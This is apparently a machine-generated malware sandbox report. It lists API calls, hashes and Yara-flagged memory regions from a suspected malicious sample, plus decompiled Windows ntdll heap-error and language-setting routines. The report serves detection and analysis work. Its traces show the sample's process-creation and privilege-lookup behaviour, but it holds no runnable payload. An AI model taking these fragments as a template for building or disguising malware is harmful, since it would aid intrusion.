                                        • Instruction Fuzzy Hash: 6E90027520109802D1106159844475A005597D0381F95C825A845565CD86D588917161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 02afa41e300bddfd09b2b07cbd8cc9d300eb1aedfd2990005fc471415b2ee500
                                        • Instruction ID: df4923460708f2277ad65024bdf1c3901e01fba9ebe8bdabf8e1b8db02a0bb21
                                        • Opcode Fuzzy Hash: 02afa41e300bddfd09b2b07cbd8cc9d300eb1aedfd2990005fc471415b2ee500
                                        • Instruction Fuzzy Hash: A390027520101842D10061594444B56005597E0381F91C42AA4155658D8655C8517561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03203AF8), ref: 0321A09D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: .z`
                                        • API String ID: 3298025750-1441809116
                                        • Opcode ID: a12eb8fa17fd586b17d51dff744fa8e3b506ecee7742bf8e5a6d82e443ab3faf
                                        • Instruction ID: da52dcfd470400c43294f97add19fd43e69a8d63a263ff0bdde16747dc383fc8
                                        • Opcode Fuzzy Hash: a12eb8fa17fd586b17d51dff744fa8e3b506ecee7742bf8e5a6d82e443ab3faf
                                        • Instruction Fuzzy Hash: A3E0EDB5200204AFCB18DF98CC49EAB3368EF48310F014154FD489B251D670E954CFE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03203AF8), ref: 0321A09D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: .z`
                                        • API String ID: 3298025750-1441809116
                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction ID: d41bc24b3af30a974d632b770e986a23650b1a3eb2661c36e0202eb2e6b15801
                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction Fuzzy Hash: FEE01AB52102086BD714DF59CC44EA777ACEF88650F018554B9085B241C630E9108AF0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0320834A
                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0320836B
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                        • Instruction ID: 8375604f64b70594648b119c48bcedca288df04413291c0736cd920f4286c0ec
                                        • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                        • Instruction Fuzzy Hash: 6001DF35A903287AE720E6A89C02FBE766CAB40B50F054018FF08BE1C1E6D4691A42E6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0320834A
                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0320836B
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: bdb64c02f59ed78068033fbe3b7f67e7f6138fa5ff83fc27ea876146f4dd1d09
                                        • Instruction ID: 9d4a922ebfe6b075f4e98b9fe4e09f7ee765b3ee52fb025d4b7ab02536b6c61d
                                        • Opcode Fuzzy Hash: bdb64c02f59ed78068033fbe3b7f67e7f6138fa5ff83fc27ea876146f4dd1d09
                                        • Instruction Fuzzy Hash: AC017D3569032836E720A6585D02FFFB718AF81B25F154244FE48BD0C2D6D4648A46E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0321A134
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction ID: 0867136a12835a5b06aaa4e16dd3076eacb2c9e0382835d27face6ecd4fb20f2
                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction Fuzzy Hash: 7601AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7240C630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0321A134
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: 83ff8a0763b7d250bb34a1b6bf9c048fae6a57057cba1c2a725af6fd4be8d1b7
                                        • Instruction ID: f33c22f11a1bbac5a72811ef6e6281f1b8d8fe52d8c0a8ed8df146201772a0d2
                                        • Opcode Fuzzy Hash: 83ff8a0763b7d250bb34a1b6bf9c048fae6a57057cba1c2a725af6fd4be8d1b7
                                        • Instruction Fuzzy Hash: 0501A4B2210108BFCB54CF99DC84EEB77ADAF8C754F158248FA5DA7251C630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0320F1A2,0320F1A2,?,00000000,?,?), ref: 0321A200
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 34f706437af20c1b1372b930f3260c99241dc153fdbee977d2fd685ed5ed76aa
                                        • Instruction ID: 9150573aef0dbddfc8924caddd924085a8b7bacc89dbd523430a6f869672d01e
                                        • Opcode Fuzzy Hash: 34f706437af20c1b1372b930f3260c99241dc153fdbee977d2fd685ed5ed76aa
                                        • Instruction Fuzzy Hash: B1E06DB66102046BCB24DF98EC80ED7B7A8EF45B60F118154FD0C6B241CA31E956CBF1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0320F1A2,0320F1A2,?,00000000,?,?), ref: 0321A200
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction ID: 99ce3e65114ad3c862e51f9f3ce152c4d7de973946f7f4652b61cec9af7912f5
                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction Fuzzy Hash: F7E01AB52002086BDB10DF49CC84EE737ADEF88650F018154BA0C6B241C930E8508BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • RtlAllocateHeap.NTDLL(03214506,?,03214C7F,03214C7F,?,03214506,?,?,?,?,?,00000000,00000000,?), ref: 0321A05D
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction ID: 70fc6946c11138b9b7d7f030545acc289fb4ad684a1a255c12b5c666dbebfc2e
                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction Fuzzy Hash: 47E012B5210208ABDB14EF99CC80EA777ACEF88660F118558BA086B241C630F9108AF0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetErrorMode.KERNELBASE(00008003,?,03208CF4,?), ref: 0320F6CB
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                        • Instruction ID: fcdda9779b3c1febfe221a741d0460a229c3eb2ed32007c3711c87534078d4cf
                                        • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                        • Instruction Fuzzy Hash: 44D0A7757A03043BE720FAA59C03F2673CD5B54B00F490074FA4CDB3C3D950E00041A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 480c12661ff8a4bcf23e9f0a6980a930e15a069e0b01d9b3f908c7f418e12840
                                        • Instruction ID: a279bc4aa58b388162a3904a630f93f68f686c6839bf5e2cbb7aa4bb012f958e
                                        • Opcode Fuzzy Hash: 480c12661ff8a4bcf23e9f0a6980a930e15a069e0b01d9b3f908c7f418e12840
                                        • Instruction Fuzzy Hash: CAB02B739010C0C5D600D3700608B37791077C0340F12C061D1020244A0378C080F2B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Strings
                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0544B314
                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0544B3D6
                                        • *** enter .cxr %p for the context, xrefs: 0544B50D
                                        • This failed because of error %Ix., xrefs: 0544B446
                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0544B48F
                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0544B53F
                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0544B476
                                        • a NULL pointer, xrefs: 0544B4E0
                                        • The instruction at %p tried to %s , xrefs: 0544B4B6
                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0544B2F3
                                        • The resource is owned exclusively by thread %p, xrefs: 0544B374
                                        • The resource is owned shared by %d threads, xrefs: 0544B37E
                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0544B305
                                        • *** Inpage error in %ws:%s, xrefs: 0544B418
                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0544B47D
                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0544B323
                                        • The critical section is owned by thread %p., xrefs: 0544B3B9
                                        • *** enter .exr %p for the exception record, xrefs: 0544B4F1
                                        • <unknown>, xrefs: 0544B27E, 0544B2D1, 0544B350, 0544B399, 0544B417, 0544B48E
                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0544B38F
                                        • The instruction at %p referenced memory at %p., xrefs: 0544B432
                                        • an invalid address, %p, xrefs: 0544B4CF
                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0544B39B
                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0544B352
                                        • write to, xrefs: 0544B4A6
                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0544B484
                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0544B2DC
                                        • Go determine why that thread has not released the critical section., xrefs: 0544B3C5
                                        • read from, xrefs: 0544B4AD, 0544B4B2
                                        • *** then kb to get the faulting stack, xrefs: 0544B51C
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                        • API String ID: 0-108210295
                                        • Opcode ID: 47bf033c4cd86fa602ee861436a682f91f24fe3066849abff5f687dfa07b64c8
                                        • Instruction ID: 16f8ca638b9873d33128b94bdb22cf077a0a12992d2c756984b621d03b635638
                                        • Opcode Fuzzy Hash: 47bf033c4cd86fa602ee861436a682f91f24fe3066849abff5f687dfa07b64c8
                                        • Instruction Fuzzy Hash: 0081F675A80220FFEF29AA06DC89DFB3B36EF86A51F84408AF4045F255D671D411EB72
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 44%
                                        			E05451C06() {
                                        				signed int _t27;
                                        				char* _t104;
                                        				char* _t105;
                                        				intOrPtr _t113;
                                        				intOrPtr _t115;
                                        				intOrPtr _t117;
                                        				intOrPtr _t119;
                                        				intOrPtr _t120;
                                        
                                        				_t105 = 0x53748a4;
                                        				_t104 = "HEAP: ";
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        					_push(_t104);
                                        					E0539B150();
                                        				} else {
                                        					E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        				}
                                        				_push( *0x548589c);
                                        				E0539B150("Heap error detected at %p (heap handle %p)\n",  *0x54858a0);
                                        				_t27 =  *0x5485898; // 0x0
                                        				if(_t27 <= 0xf) {
                                        					switch( *((intOrPtr*)(_t27 * 4 +  &M05451E96))) {
                                        						case 0:
                                        							_t105 = "heap_failure_internal";
                                        							goto L21;
                                        						case 1:
                                        							goto L21;
                                        						case 2:
                                        							goto L21;
                                        						case 3:
                                        							goto L21;
                                        						case 4:
                                        							goto L21;
                                        						case 5:
                                        							goto L21;
                                        						case 6:
                                        							goto L21;
                                        						case 7:
                                        							goto L21;
                                        						case 8:
                                        							goto L21;
                                        						case 9:
                                        							goto L21;
                                        						case 0xa:
                                        							goto L21;
                                        						case 0xb:
                                        							goto L21;
                                        						case 0xc:
                                        							goto L21;
                                        						case 0xd:
                                        							goto L21;
                                        						case 0xe:
                                        							goto L21;
                                        						case 0xf:
                                        							goto L21;
                                        					}
                                        				}
                                        				L21:
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        					_push(_t104);
                                        					E0539B150();
                                        				} else {
                                        					E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        				}
                                        				_push(_t105);
                                        				E0539B150("Error code: %d - %s\n",  *0x5485898);
                                        				_t113 =  *0x54858a4; // 0x0
                                        				if(_t113 != 0) {
                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        						_push(_t104);
                                        						E0539B150();
                                        					} else {
                                        						E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        					}
                                        					E0539B150("Parameter1: %p\n",  *0x54858a4);
                                        				}
                                        				_t115 =  *0x54858a8; // 0x0
                                        				if(_t115 != 0) {
                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        						_push(_t104);
                                        						E0539B150();
                                        					} else {
                                        						E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        					}
                                        					E0539B150("Parameter2: %p\n",  *0x54858a8);
                                        				}
                                        				_t117 =  *0x54858ac; // 0x0
                                        				if(_t117 != 0) {
                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        						_push(_t104);
                                        						E0539B150();
                                        					} else {
                                        						E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        					}
                                        					E0539B150("Parameter3: %p\n",  *0x54858ac);
                                        				}
                                        				_t119 =  *0x54858b0; // 0x0
                                        				if(_t119 != 0) {
                                        					L41:
                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        						_push(_t104);
                                        						E0539B150();
                                        					} else {
                                        						E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        					}
                                        					_push( *0x54858b4);
                                        					E0539B150("Last known valid blocks: before - %p, after - %p\n",  *0x54858b0);
                                        				} else {
                                        					_t120 =  *0x54858b4; // 0x0
                                        					if(_t120 != 0) {
                                        						goto L41;
                                        					}
                                        				}
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        					_push(_t104);
                                        					E0539B150();
                                        				} else {
                                        					E0539B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        				}
                                        				return E0539B150("Stack trace available at %p\n", 0x54858c0);
                                        			}











                                        0x05451e15
                                        0x05451e2a
                                        0x05451e2f
                                        0x05451e39
                                        0x05451e4a
                                        0x05451e02
                                        0x05451e02
                                        0x05451e08
                                        0x00000000
                                        0x00000000
                                        0x05451e08
                                        0x05451e5b
                                        0x05451e7a
                                        0x05451e7b
                                        0x05451e5d
                                        0x05451e72
                                        0x05451e77
                                        0x05451e95

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                        • API String ID: 0-2897834094
                                        • Opcode ID: e01e7f0135b0d3ca57ed505cdb506d0cf8e7fcfeeaa91a67fff3b203caaf0a05
                                        • Instruction ID: f62d1f10035b4072586522070c4ea8a6ae3328131b044940917062ee32b23e9d
                                        • Opcode Fuzzy Hash: e01e7f0135b0d3ca57ed505cdb506d0cf8e7fcfeeaa91a67fff3b203caaf0a05
                                        • Instruction Fuzzy Hash: 4F610B76618644EFC61AE744E499FB5B3B9EB00D30B09407BFC0E5B312C674A851EB0A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E053A3D34(signed int* __ecx) {
                                        				signed int* _v8;
                                        				char _v12;
                                        				signed int* _v16;
                                        				signed int* _v20;
                                        				char _v24;
                                        				signed int _v28;
                                        				signed int _v32;
                                        				char _v36;
                                        				signed int _v40;
                                        				signed int _v44;
                                        				signed int* _v48;
                                        				signed int* _v52;
                                        				signed int _v56;
                                        				signed int _v60;
                                        				char _v68;
                                        				signed int _t140;
                                        				signed int _t161;
                                        				signed int* _t236;
                                        				signed int* _t242;
                                        				signed int* _t243;
                                        				signed int* _t244;
                                        				signed int* _t245;
                                        				signed int _t255;
                                        				void* _t257;
                                        				signed int _t260;
                                        				void* _t262;
                                        				signed int _t264;
                                        				void* _t267;
                                        				signed int _t275;
                                        				signed int* _t276;
                                        				short* _t277;
                                        				signed int* _t278;
                                        				signed int* _t279;
                                        				signed int* _t280;
                                        				short* _t281;
                                        				signed int* _t282;
                                        				short* _t283;
                                        				signed int* _t284;
                                        				void* _t285;
                                        
                                        				_v60 = _v60 | 0xffffffff;
                                        				_t280 = 0;
                                        				_t242 = __ecx;
                                        				_v52 = __ecx;
                                        				_v8 = 0;
                                        				_v20 = 0;
                                        				_v40 = 0;
                                        				_v28 = 0;
                                        				_v32 = 0;
                                        				_v44 = 0;
                                        				_v56 = 0;
                                        				_t275 = 0;
                                        				_v16 = 0;
                                        				if(__ecx == 0) {
                                        					_t280 = 0xc000000d;
                                        					_t140 = 0;
                                        					L50:
                                        					 *_t242 =  *_t242 | 0x00000800;
                                        					_t242[0x13] = _t140;
                                        					_t242[0x16] = _v40;
                                        					_t242[0x18] = _v28;
                                        					_t242[0x14] = _v32;
                                        					_t242[0x17] = _t275;
                                        					_t242[0x15] = _v44;
                                        					_t242[0x11] = _v56;
                                        					_t242[0x12] = _v60;
                                        					return _t280;
                                        				}
                                        				if(E053A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                        					_v56 = 1;
                                        					if(_v8 != 0) {
                                        						L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                        					}
                                        					_v8 = _t280;
                                        				}
                                        				if(E053A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                        					_v60 =  *_v8;
                                        					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                        					_v8 = _t280;
                                        				}
                                        				if(E053A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                        					L16:
                                        					if(E053A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                        						L28:
                                        						if(E053A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                        							L46:
                                        							_t275 = _v16;
                                        							L47:
                                        							_t161 = 0;
                                        							L48:
                                        							if(_v8 != 0) {
                                        								L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                        							}
                                        							_t140 = _v20;
                                        							if(_t140 != 0) {
                                        								if(_t275 != 0) {
                                        									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                        									_t275 = 0;
                                        									_v28 = 0;
                                        									_t140 = _v20;
                                        								}
                                        							}
                                        							goto L50;
                                        						}
                                        						_t167 = _v12;
                                        						_t255 = _v12 + 4;
                                        						_v44 = _t255;
                                        						if(_t255 == 0) {
                                        							_t276 = _t280;
                                        							_v32 = _t280;
                                        						} else {
                                        							_t276 = L053B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                        							_t167 = _v12;
                                        							_v32 = _t276;
                                        						}
                                        						if(_t276 == 0) {
                                        							_v44 = _t280;
                                        							_t280 = 0xc0000017;
                                        							goto L46;
                                        						} else {
                                        							E053DF3E0(_t276, _v8, _t167);
                                        							_v48 = _t276;
                                        							_t277 = E053E1370(_t276, 0x5374e90);
                                        							_pop(_t257);
                                        							if(_t277 == 0) {
                                        								L38:
                                        								_t170 = _v48;
                                        								if( *_v48 != 0) {
                                        									E053DBB40(0,  &_v68, _t170);
                                        									if(L053A43C0( &_v68,  &_v24) != 0) {
                                        										_t280 =  &(_t280[0]);
                                        									}
                                        								}
                                        								if(_t280 == 0) {
                                        									_t280 = 0;
                                        									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                        									_v44 = 0;
                                        									_v32 = 0;
                                        								} else {
                                        									_t280 = 0;
                                        								}
                                        								_t174 = _v8;
                                        								if(_v8 != 0) {
                                        									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                        								}
                                        								_v8 = _t280;
                                        								goto L46;
                                        							}
                                        							_t243 = _v48;
                                        							do {
                                        								 *_t277 = 0;
                                        								_t278 = _t277 + 2;
                                        								E053DBB40(_t257,  &_v68, _t243);
                                        								if(L053A43C0( &_v68,  &_v24) != 0) {
                                        									_t280 =  &(_t280[0]);
                                        								}
                                        								_t243 = _t278;
                                        								_t277 = E053E1370(_t278, 0x5374e90);
                                        								_pop(_t257);
                                        							} while (_t277 != 0);
                                        							_v48 = _t243;
                                        							_t242 = _v52;
                                        							goto L38;
                                        						}
                                        					}
                                        					_t191 = _v12;
                                        					_t260 = _v12 + 4;
                                        					_v28 = _t260;
                                        					if(_t260 == 0) {
                                        						_t275 = _t280;
                                        						_v16 = _t280;
                                        					} else {
                                        						_t275 = L053B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                        						_t191 = _v12;
                                        						_v16 = _t275;
                                        					}
                                        					if(_t275 == 0) {
                                        						_v28 = _t280;
                                        						_t280 = 0xc0000017;
                                        						goto L47;
                                        					} else {
                                        						E053DF3E0(_t275, _v8, _t191);
                                        						_t285 = _t285 + 0xc;
                                        						_v48 = _t275;
                                        						_t279 = _t280;
                                        						_t281 = E053E1370(_v16, 0x5374e90);
                                        						_pop(_t262);
                                        						if(_t281 != 0) {
                                        							_t244 = _v48;
                                        							do {
                                        								 *_t281 = 0;
                                        								_t282 = _t281 + 2;
                                        								E053DBB40(_t262,  &_v68, _t244);
                                        								if(L053A43C0( &_v68,  &_v24) != 0) {
                                        									_t279 =  &(_t279[0]);
                                        								}
                                        								_t244 = _t282;
                                        								_t281 = E053E1370(_t282, 0x5374e90);
                                        								_pop(_t262);
                                        							} while (_t281 != 0);
                                        							_v48 = _t244;
                                        							_t242 = _v52;
                                        						}
                                        						_t201 = _v48;
                                        						_t280 = 0;
                                        						if( *_v48 != 0) {
                                        							E053DBB40(_t262,  &_v68, _t201);
                                        							if(L053A43C0( &_v68,  &_v24) != 0) {
                                        								_t279 =  &(_t279[0]);
                                        							}
                                        						}
                                        						if(_t279 == 0) {
                                        							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                        							_v28 = _t280;
                                        							_v16 = _t280;
                                        						}
                                        						_t202 = _v8;
                                        						if(_v8 != 0) {
                                        							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                        						}
                                        						_v8 = _t280;
                                        						goto L28;
                                        					}
                                        				}
                                        				_t214 = _v12;
                                        				_t264 = _v12 + 4;
                                        				_v40 = _t264;
                                        				if(_t264 == 0) {
                                        					_v20 = _t280;
                                        				} else {
                                        					_t236 = L053B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                        					_t280 = _t236;
                                        					_v20 = _t236;
                                        					_t214 = _v12;
                                        				}
